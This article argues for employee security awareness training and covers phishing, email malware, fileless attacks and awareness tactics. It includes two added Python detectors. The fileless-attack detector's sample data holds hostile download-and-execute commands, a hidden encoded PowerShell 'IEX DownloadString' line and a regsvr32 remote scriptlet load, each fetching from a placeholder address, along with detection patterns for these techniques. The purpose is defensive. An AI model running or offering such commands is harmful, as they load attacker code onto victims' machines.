The Importance of Security Awareness
Last updated on 6th Oct 2020
When hackers breached retail giant Target’s databases, they stole the credit and debit card information of more than 40 million customers. It remains one of the largest cybersecurity hacks in history.
Fast forward to today, and 2018 has seen trending news of cybersecurity incidents strike Macy’s, Whole Foods, Delta, Under Armour, Uber, Panera Bread and many, many more. This doesn’t even mention the cybersecurity tsunamis that have come to be synonymous with data-protection failures, network-security lapses or general IT infrastructure mismanagement.
It’s not just the big guys getting attacked. Small businesses make up nearly 61 percent of all cyber attack targets, up from 55 percent in 2016. Between halted operations and damage reparations, cyberattacks cost the average small to medium business (SMB) over $2 million and have been known to shut down entire enterprises, sometimes permanently.
And remember that Target breach? It happened not because of negligence inside Target’s own IT department but because attackers found a way in through one of Target’s HVAC vendors, whose access to Target’s network gave them their foothold.
It’s hard to ignore what all this indicates: cyber threats are far more interwoven, and far more prevalent, than meets the eye. When it comes to how prepared your employees are for a cybersecurity emergency in particular, organizations can no longer roll the dice.
Perhaps surprisingly, a recent CybSafe survey found that around 31% of businesses are without security awareness training whatsoever. A recent UK government survey, meanwhile, found UK businesses introduced fewer new security awareness training measures than they did in 2017.
“Businesses are less likely to have implemented extra staff awareness or training measures than in the 2017 survey (18% versus 28%), despite human error or staff awareness continuing to be among the most common factors contributing to the most disruptive breach.” Department for Digital, Culture, Media & Sport Cyber Security Breaches Survey 2018
So while security professionals might already understand the benefits of security awareness training, others, it seems, are yet to be convinced.
Why, then, is security awareness training still so important today? Here are 7 reasons.
1. To prevent breaches and attacks :
Starting with the most obvious, security awareness training helps prevent breaches.
The precise number of breaches security awareness training prevents is difficult to quantify. In an ideal world, we’d be able to run a controlled trial in which the exact same people working for the exact same company were divided into two groups: a control and a test group. The latter would be given training, the former would not. The two could then be compared.
Such a situation is an impossibility – but that doesn’t mean advanced security awareness training providers are unable to demonstrate the ROI of security awareness software. Although an imperfect measure, it’s possible to measure the incidence and prevalence of breaches pre- and post-awareness campaigns and use the resulting metrics to glean an indication of ROI. The metric might not be ideal, but considering the average costs of a data breach now run into the multi-millions, and considering security awareness training is relatively inexpensive, it certainly doesn’t take much for serious returns.
2. To influence company culture :
A culture of security has long been seen as the holy grail for chief information security officers (CISOs). Equally, such a culture is seen as notoriously difficult to achieve.
With the aid of security awareness training, some are heading in the right direction.
At least some of today’s security awareness training platforms acknowledge the value of a secure culture – and attempt to measure it from the outset. The same metrics are then monitored as time goes on.
By keeping an eye on indicators of culture, advanced security awareness training platforms can actually help security professionals monitor, nurture and develop a culture of security – making their people a proactive defence.
3. To make technological defences more robust :
Technological defences are, clearly, a valuable weapon in preventing breaches. But technological defences require input from people. Firewalls need to be turned on. Security warnings need to be acknowledged. Software needs to be updated.
Few businesses today would dream of operating without technological defences. And yet, without security awareness training, technological defences are not used to their full potential.
To make matters worse, attackers today rarely bother attempting to penetrate businesses through purely technological means. Today’s attackers typically prefer to target people, who are often seen as an easy way in to protected networks.
4. To win more customers :
Security awareness training helps people win more high-profile contracts.
This isn’t conjecture. In CybSafe’s recent survey of 250 IT decision makers, more than half said a business customer had made cyber security precautions a condition of an existing contract or of the RFP process for winning one. More than two thirds said at least one customer had required them to achieve a recognised cyber security standard.
While security awareness training might seem unimportant to some, it’s often far from unimportant to some business customers.
5. For compliance :
To be clear, compliance alone is no reason to introduce security awareness training. As we’ve highlighted before, those who introduce training solely to comply with regulations are probably heading for trouble.
But more and more regulators are demanding specific industries implement security awareness training.
“Over the next year, we will strengthen our supervisory assessments of the highest impact firms to better understand their current and planned use of technology, resilience to cyber-attacks and staff expertise. We will also review how governance, strategy, systems architecture, risk management and culture contribute to firms’ data security.”
CybSafe partner, the Financial Conduct Authority, on shaping future policies
Compliance can be a happy offshoot of security awareness training. Those who introduce it become more secure and, in many industries, meet a regulatory requirement.
6. To behave in a socially responsible manner :
As WannaCry and NotPetya have recently demonstrated, cyber attacks spread at unprecedented speeds. The more networks that become infected, the more at-risk other networks become.
Equally, thanks to connected networks, a decrease in individual network security increases the overall threat landscape for others.
The absence of security awareness training in one organisation makes other organisations vulnerable. It’s a little like leaving your house door unlocked – with the keys to next door waiting inside.
Security awareness training doesn’t just benefit you. It benefits your customers, your suppliers and everyone else interlinked with your network.
7. For employee wellbeing :
It’s well-documented that happy people are productive people – hence employee welfare schemes, company away days and a large part of any given HR department’s focus. So it’s worth remembering: security awareness training doesn’t just keep people safe at work. It keeps them safe in their personal life, too.
For the most part, this particular benefit remains unseen. If security awareness training does what it’s supposed to do, it isn’t just an employer benefit. It’s an employee benefit, too.
Why It’s Important Now
Negligent employees, contractors and third-party vendors represent the cause of over half of all enterprise data breaches.
This is a sobering statistic, one that keeps network administrators and IT managers up at night. After all, employee negligence hardly represents intent. More often than not, good-intentioned employees make mistakes or skirt safe IT protocols because they’re tricked, rushed for time or are unaware there’s protocol set in the first place.
With cybersecurity incidents projected to rise, so does the potential for employee errors and the employee-enacted data breaches that statistically follow them. The following workplace and cultural trends only emphasize why it’s more important than ever to establish cybersecurity awareness training with your employees:
1. Remote Work/Telecommuting
Telecommuting has become a reality rather than a fantasy for many workers thanks to mobile and cloud technologies. In less than ten years, businesses across the country have been able to incorporate substantial work-from-home policies, reshaping the ways companies view productivity, profitability and what it means to be a “good” worker.
- Half of the U.S. workforce currently holds a job compatible with telecommuting.
- Over 40 percent of businesses offer some form of flex work or a work-from-home option.
- Between 20 and 25 percent of the U.S. workforce already telecommutes with some frequency.
- Around 4 million people work at least half-time from home, or two to three days a week.
- By 2020, estimates show nearly 50 percent of workers will be working remotely at least part-time.
The same mobile and cloud technologies that have unleashed telecommuting also pose its greatest risk. For starters, businesses must secure, end to end, the remote connections employees use to reach office resources. What’s more, those same employees must understand the security liabilities and best practices of any personal device used for work, or be issued corporate laptops, smartphones and other equipment with company-approved security controls. Such efforts take commitment, time and training, the hallmarks of cybersecurity awareness programs.
2. Increased Government Regulation
The importance of cybersecurity practices, training and systems isn’t isolated to private, internal business operations. Government agencies and legislators are catching on as well, with ripple effects that have changed the way private and public enterprises alike must protect their digital systems and information.
The past two decades have seen both state and federal movements to draft cybersecurity regulations. Within these, guidelines and mandates provide a structure for how businesses must install “reasonable” levels of security through protective software and hardware, as well as maintain “required security practices” amongst their employees, contractors and vendors.
Certain industries are affected by cybersecurity regulatory requirements more than others. For example, healthcare, finance and government contractors face industry-specific directives, most notably through the three following statutes, respectively:
- The Health Insurance Portability and Accountability Act (HIPAA)
- The Gramm-Leach-Bliley Act (GLBA), otherwise known as the Financial Services Modernization Act
- The Homeland Security Act and the Federal Information Security Management Act (FISMA)
Depending on your industry, you may be required to perform routine cybersecurity awareness training in addition to these compliance measures.
3. The Internet of Things (IoT)
While we’re currently still in the infancy of a widespread Internet of Things, businesses and their employees across the country must be preemptive, not reactive, to its impending landscape. With the vast majority of employees using a personal device to access company networks or perform company work — and those devices poised to be more interconnected and communicative with other devices and networks — cybersecurity vulnerabilities only compound.
The IoT makes “bring your own device” (BYOD) workplace policies and standardized best-practices even more pressing. After all, many employee mobile devices today lack appropriate defenses against threats like mobile malware, email phishing and more.
Types of Attacks Employees Are Susceptible To
Strong security awareness training should directly address today’s (and tomorrow’s) most pressing cybersecurity hazards.
In other words, training prepares employees, which in turn prepares enterprises. The more your employees know, the more they’re able to identify and avoid the following cybersecurity storms:
1. Phishing
Phishing, a form of social-engineering attack, is the most common business cyber threat. Almost half of surveyed SMBs experienced a phishing-based breach attempt, with large companies and organizations close behind at 42 percent.
Phishing scams aim to get employees to click malicious links or download tainted files, typically embedded in emails. The link or attachment then gives the attacker a direct gateway into private networks from which to extract data. Links can appear internal or external facing, and phishers have grown more sophisticated: a phishing site can carry a valid certificate and load over HTTPS, so the padlock icon alone no longer tells an employee that a website or profile is safe.
Similarly, phishing also extends to emails and messages that try to elicit sensitive information from your employees directly. The messages appear to come from a colleague, a manager or a familiar third party, tricking employees into thinking they are responding to something business-critical.
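The link tricks described above are also checkable by a mail gateway or a security team, not only by a trained eye. The following is an added example, not code from the original article: it extracts the anchors from an HTML message body, flags links whose visible text names one domain while the href goes to another, decodes internationalised (xn--) host names and folds accented letters to catch look-alike domains, and flags a trusted domain appearing as a subdomain of an unrelated site. The trusted-domain list and the message body are constructed for the example, and the registrable-domain logic is a deliberate simplification (real code should consult the Public Suffix List).

```python
"""Flag suspicious links in an HTML e-mail body.

Added example, not from the original article. Heuristics:
  1. anchor text reads as a URL/domain but the href goes elsewhere;
  2. the host is internationalised (xn-- labels or non-ASCII letters) and,
     with accents folded, resembles a trusted domain;
  3. a trusted domain appears as a *subdomain* of another registrable domain.
TRUSTED_DOMAINS and SAMPLE_EMAIL are constructed for illustration.
"""
import re
import unicodedata
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_DOMAINS = {"example-bank.com", "corp.example"}  # assumed, for illustration
# Visible text a reader would take to be an address: "https://x.y/..." or "x.y"
DOMAIN_LIKE = re.compile(r"^(https?://)?[\w.-]+\.[a-z]{2,}(/\S*)?$", re.I)


class _LinkExtractor(HTMLParser):
    """Collect (href, visible text) for every <a> in the body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def extract_links(html):
    parser = _LinkExtractor()
    parser.feed(html)
    return parser.links


def host_of(url_or_domain):
    """Lower-cased host of a URL; bare domains are accepted too."""
    if "://" not in url_or_domain:
        url_or_domain = "http://" + url_or_domain
    return (urlparse(url_or_domain).hostname or "").lower()


def registrable_domain(host):
    # Simplification: last two labels. Production code should use the Public Suffix List.
    parts = host.rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def unicode_host(host):
    """Decode punycode (xn--) labels to Unicode; return other hosts unchanged."""
    try:
        return host.encode("ascii").decode("idna")
    except UnicodeError:
        return host


def ascii_skeleton(text):
    """Crude confusable folding: strip combining marks so 'exämple' -> 'example'."""
    return "".join(c for c in unicodedata.normalize("NFKD", text) if not unicodedata.combining(c))


def analyse_link(href, text):
    """Return the reasons this link is suspicious (empty list if none)."""
    reasons = []
    host = host_of(href)
    if not host:
        return reasons
    # 1. The text reads as one address while the link goes to another.
    if text and DOMAIN_LIKE.match(text):
        shown = host_of(text)
        if shown and registrable_domain(shown) != registrable_domain(host):
            reasons.append(f"display/target mismatch: shows {shown}, goes to {host}")
    # 2. Internationalised host. A padlock proves nothing: anyone can get a
    #    valid certificate for a look-alike domain they control.
    uhost = unicode_host(host)
    if not uhost.isascii():
        note = f"internationalised host name {uhost}"
        lookalike = registrable_domain(ascii_skeleton(uhost))
        if lookalike in TRUSTED_DOMAINS:
            note += f" resembles trusted domain {lookalike}"
        reasons.append(note)
    # 3. Trusted name buried in a subdomain of an unrelated registrable domain.
    reg = registrable_domain(host)
    for trusted in TRUSTED_DOMAINS:
        if trusted in host and reg != trusted:
            reasons.append(f"{trusted} appears inside {host}, but the registrable domain is {reg}")
    return reasons


def suspicious_links(html):
    """All links in the body that trip at least one heuristic."""
    return [(href, analyse_link(href, text)) for href, text in extract_links(html)
            if analyse_link(href, text)]


# Constructed message body (not a real e-mail). The second link is the punycode
# form of "exämple-bank.com", generated here so it is exactly right.
PUNY_HOST = "exämple-bank.com".encode("idna").decode("ascii")
SAMPLE_EMAIL = f"""
<p>Your account is locked. Verify at
<a href="https://example-bank.com.attacker.test/login">https://example-bank.com/login</a></p>
<p>Or use <a href="https://{PUNY_HOST}/">our secure site</a>.</p>
<p>Policy reminder: <a href="https://corp.example/policy">https://corp.example/policy</a></p>
"""

if __name__ == "__main__":
    for href, reasons in suspicious_links(SAMPLE_EMAIL):
        print(href, "->", "; ".join(reasons))
```

Run as a script, it reports the first two links and stays silent on the third, whose visible text, target and registrable domain all agree. The same three checks are what an employee is being asked to perform by eye; automating them at the gateway removes the need to rely on that.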
2. Malware Email Attacks
Malware email attacks are a subset of broader malware threats that use email as their delivery mechanism. They are also a risk category on the rise: Symantec’s 2018 Internet Security Threat Report indicates that nearly 88 percent of these attacks rely on malware-laden attachments that employees download, compromising a device, server or network.
One click from an employee is all it takes. Once a tainted attachment is downloaded, the malware infects its target and can cause irreversible damage to files, databases and even the entire server.
Watchdog reports indicate over 72 percent of email malware breaches occur in businesses with 100 employees or fewer. Small businesses themselves are technically defined as those with 250 employees or fewer. Similar email malware attack studies have found that the average small business receives at least nine infected emails a month per employee.
3. Fileless Attacks
One of the more contemporary cybersecurity threats is known as a fileless attack. As the name suggests, fileless attacks do not rely on malicious attachments or links, or on dropping a new executable to disk. Instead, they work with what’s already there: the operating system’s own scripting engines and administration tools, and the software, applications and programs your employees use regularly, which may be vulnerable due to age or lack of updates, or may simply be abused for what they were designed to do.
Some industry research puts fileless attacks at ten times more likely to succeed than traditional, file-based phishing or attachment scams. That’s because they can be nearly invisible to the average worker: nothing is downloaded and nothing new appears on disk. Once an attacker has exploited an application vulnerability or hijacked a legitimate tool, they hold a foothold that runs entirely in memory, from which they can spy, take control, administer the machine and extract sensitive data straight from the operating system.
Fileless attacks remain relatively unknown to the average employee. To compound the issue, anti-virus that scans files on disk has little to inspect when nothing is written there; catching these attacks means watching behaviour instead, such as which process launched a script host and what command line it was given.
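Because file scanning has little to work with here, detection falls on process behaviour. The following added example, not code from the original article, scores constructed process-creation records shaped like Sysmon Event ID 1 or EDR telemetry (parent image, image, command line) for living-off-the-land indicators: an encoded PowerShell command is base64-decoded from UTF-16LE and the decoded script scanned alongside the command line; the text is checked for in-memory download-and-execute patterns, hidden-window and policy-bypass switches, regsvr32 remote scriptlet loading and WMI process creation; and an Office application spawning a script host is flagged. The field names, the sample events and the address 203.0.113.5 (a documentation range) are this example’s own assumptions.

```python
"""Score process-creation events for fileless / living-off-the-land tradecraft.

Added example, not from the original article. Events are dicts shaped like
Sysmon Event ID 1 or EDR telemetry; field names, sample events and the
203.0.113.5 address (documentation range) are constructed for this example.
"""
import base64
import re

# Applications that should never need to launch a script host themselves.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "wmic.exe"}

# Applied to the command line plus any decoded PowerShell payload.
PATTERNS = [
    (re.compile(r"\bInvoke-Expression\b|\bIEX\b", re.I), "in-memory execution (IEX)"),
    (re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|Net\.WebClient", re.I),
     "downloads payload into memory"),
    (re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-e(xecutionpolicy|p)\s+bypass", re.I),
     "hidden/unrestricted PowerShell switches"),
    (re.compile(r"\bscrobj\.dll\b|/i:https?://", re.I), "regsvr32 remote scriptlet"),
    (re.compile(r"\bprocess\s+call\s+create\b", re.I), "WMI process creation"),
    (re.compile(r"\bjavascript:|\bvbscript:", re.I), "script protocol handler"),
    (re.compile(r"\[(System\.)?Reflection\.Assembly\]", re.I), "reflective assembly load"),
]

# powershell -e/-ec/-en/-enc/-EncodedCommand <base64 of a UTF-16LE script>
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is no valid one."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def score_event(event):
    """List the reasons an event looks like fileless tradecraft (empty = nothing seen)."""
    parent, image = _basename(event["parent_image"]), _basename(event["image"])
    cmdline = event["command_line"]
    reasons, text = [], cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("base64-encoded PowerShell command")
        text = cmdline + " " + decoded  # scan what actually runs, not just the wrapper
    for pattern, why in PATTERNS:
        if pattern.search(text):
            reasons.append(why)
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {image}")
    return reasons


def triage(events):
    """(event id, reasons) for every event that trips at least one rule."""
    out = []
    for event in events:
        reasons = score_event(event)
        if reasons:
            out.append((event["id"], reasons))
    return out


def _encode_ps(script):
    """How -enc payloads are built: base64 over the UTF-16LE script bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


MALICIOUS_PS = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"

SAMPLE_EVENTS = [  # constructed telemetry, not captured data
    {"id": 1, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {_encode_ps(MALICIOUS_PS)}"},
    {"id": 2, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": "regsvr32.exe /s /n /u /i:http://203.0.113.5/x.sct scrobj.dll"},
    {"id": 3, "parent_image": r"C:\Windows\explorer.exe",  # benign admin script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"},
    {"id": 4, "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": 'wmic /node:fileserver01 process call create "powershell -w hidden -nop -c Get-Process"'},
]

if __name__ == "__main__":
    for event_id, reasons in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: " + "; ".join(reasons))
```

Event 3, a signed administrative script started from the desktop, trips nothing, which is the point of scoring behaviour rather than blocking PowerShell outright; event 1 trips five rules at once because the decoded payload, not just the launcher, is inspected. In production the same logic would run over your EDR or Sysmon feed rather than an inline list.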
4. Employee Errors
Human errors leading to data breaches and sensitive information leaks account for nearly a third of enterprise security incidents overall.
These numbers fall behind only phishing and malware attachment attacks in terms of prevalence. And while it may sound the least harmful of cybersecurity attack types, it’s far from it. Even small employee errors can result in everything from regulatory noncompliance to irreconcilable data loss, typically after the following accidents:
- Unintended disclosures, such as faxes sent to the wrong extension, emails sent to the wrong recipient or files being shared with the wrong vendor.
- Improper disposals, primarily when employees do not dispose of paper-based documents containing sensitive data in a thorough, secure manner.
- Accidental deletions, with employees erasing important files or entire databases. This issue gets compounded if a department or organization has not been habitually backing up data.
The Awareness Tactics You Should Use
When it comes to cybersecurity awareness, the best defense truly is a strong offense.
Businesses can’t rest on their laurels, maintaining legacy systems or recycling the same old security practices. Network managers have a range of tactics to deploy to educate employees and nurture stronger cybersecurity awareness.
1. Speak Their Language
Leave the technical jargon, industry-speak and million-dollar words at the door. You’re engaging real people across real, diverse departments, not writing a dissertation.
Cybersecurity awareness will stick when it’s tailored to its audience. Highlight specific examples of how new policies and procedures will make employees’ work lives easier, not more tedious or stressful. Walk them through pertinent, department-specific security examples. Use relevant metaphors. And most of all, keep things common sense. Practical, everyday solutions go a long way toward reducing employee errors.
2. Make Trainings Engaging…
The best tactic to institutionalize cybersecurity awareness training is to make it a full activity for your employees, not a passive obligation.
Many strategies can be employed to do so. Paper sessions, quizzes and questionnaires completed beforehand prime employees to reflect on their own security insights and experiences. These provide direct fodder for the material covered in training, and employees are more invested in what’s discussed because they’ve already put time and thought into it.
Furthermore, don’t be afraid to step outside the box when it comes to the training and presentations themselves. Utilize multimedia, stories and even hands-on activities for more impactful sessions.
3. …And Quantifiable
Awareness tactics are only as good as their results. And the results are only good if they can be seen and measured. For security awareness training, identify performance goals and their baselines before new policies and procedures get implemented. Track these goals with relevant KPIs, then tweak and tailor accordingly.
4. Remain Positive
Scare tactics and apocalyptic breach stories only go so far, particularly to non-tech employees who may see themselves as removed from the cybersecurity and IT narrative.
Instead, balance stressing the importance of cybersecurity awareness with positive updates. Report on progress, share examples of jobs and tasks made safer as well as errors caught or threats mitigated. This keeps up momentum and reframes the importance of cybersecurity from doom-and-gloom vigilance to victory.
The work network managers and IT personnel do is only part of the puzzle. If cybersecurity organizational buy-in across departments doesn’t take hold, then any effort will inevitably fall short of outlined goals.
The key to inter-departmental institutionalization lies in the three “Fs” — focus, functionality and frequency. When cultivated, the three Fs bring all employees on board for a tighter, more cyber-secure environment.
1. Start With the Passwords
Maintaining a robust employee password policy is like eating vegetables — everyone knows they should be doing it, but few actually do.
This needs to change. Over 59 percent of IT managers surveyed stated they did not have administrative visibility into their employees’ password practices. This opens the floodgates for security risks, with employees potentially recycling the same word or phrase — if they’re changing it at all.
Employing password standards is a baseline cybersecurity awareness measure, but one that works. Combined with multi-factor authentication, strong passwords form a first line of network and application defense that employees everywhere can take ownership of.
2. Restrict Access to Applications and Files
Limiting who can open, edit or delete each application and file, with read-only access wherever editing isn’t needed, reduces the chance of employee errors such as unintended disclosures or accidental deletions. It also limits how far an attacker who compromises one account, including through a fileless attack that rides on that account’s privileges, can burrow into databases. A smaller pool of people with access means a smaller pool of targets for hackers.
What’s more, depending on your organization’s industry, enforcing such access controls might be a mandatory regulatory standard.
3. Be Choosy When It Comes to Software
Software used across departments and throughout the organization must be vetted and researched, with particular attention paid to how it encrypts data, end to end where the product offers it. Department managers each bear responsibility for conducting such assessments and adding core applications to an organizational allowlist (often called a whitelist), the set of approved software all employees may use.
While allowlisting isn’t foolproof, it gives departments a leg up in keeping unapproved software from opening network and server gateways. It also complements endpoint security controls, giving the organization a clearer picture of safe everyday operations, from how employees message one another to how third parties receive essential files.
4. Consider Certifications
Certification against standards such as ISO/IEC 27001 was created to strengthen a business’s information-security management. It builds data storage, security, usage and communications best practices into enterprise operations, requiring the organization to analyze its current vulnerabilities and tailor contemporary solutions.
ISO certifications also aren’t evergreen, a pivotal perk when it comes to technology: they must be maintained through periodic audits and recertification. Keeping a certification current keeps a business abreast of current cybersecurity threats and solutions. It also bolsters compliance efforts and instills an all-hands-on-deck, interdepartmental attention to preventing breaches, hacks and data loss.
You can’t turn back the clock on organizational security awareness. But you can tune your dials today, prepping employees, operations and technology for a better tomorrow.